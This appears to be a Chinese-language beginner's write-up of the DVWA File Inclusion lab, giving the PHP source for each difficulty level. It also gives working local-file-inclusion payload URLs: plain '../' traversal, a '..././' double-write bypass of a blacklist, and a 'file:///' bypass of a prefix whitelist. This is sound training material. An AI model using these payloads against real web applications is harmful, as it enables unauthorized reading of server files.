新手DVWA-File Inclusion
阿新 • • 發佈:2020-07-23
File Inclusion
File Inclusion即檔案包含,是指使用了包含函式時,由於對引數過濾不當,導致使用者讀取和執行了意料之外的內容和命令
low
伺服器核心程式碼
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
無任何過濾
解法
沒過濾的,直接包含:http://192.168.37.141:89/vulnerabilities/fi/?page=../../phpinfo.php
medium
伺服器核心程式碼
<?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file ); ?>
程式碼上存在黑名單過濾
解法
雙寫繞過:http://192.168.37.141:89/vulnerabilities/fi/?page=..././..././phpinfo.php
high
伺服器核心程式碼
<?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation if( !fnmatch( "file*", $file ) && $file != "include.php" ) { // This isn't the page we want! echo "ERROR: File not found!"; exit; } ?>
白名單,要求檔案只能是file開頭或者include.php
解法
這裡可以使用file協議,繼續構造:http://192.168.37.141:89/vulnerabilities/fi/?page=file:///C:\inetpub\target\DVWA\phpinfo.php
impossible
伺服器核心程式碼
<?php // The page we wish to display $file = $_GET[ 'page' ]; // Only allow include.php or file{1..3}.php if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { // This isn't the page we want! echo "ERROR: File not found!"; exit; } ?>
白名單限定了引數範圍,無法進行任意檔案包含了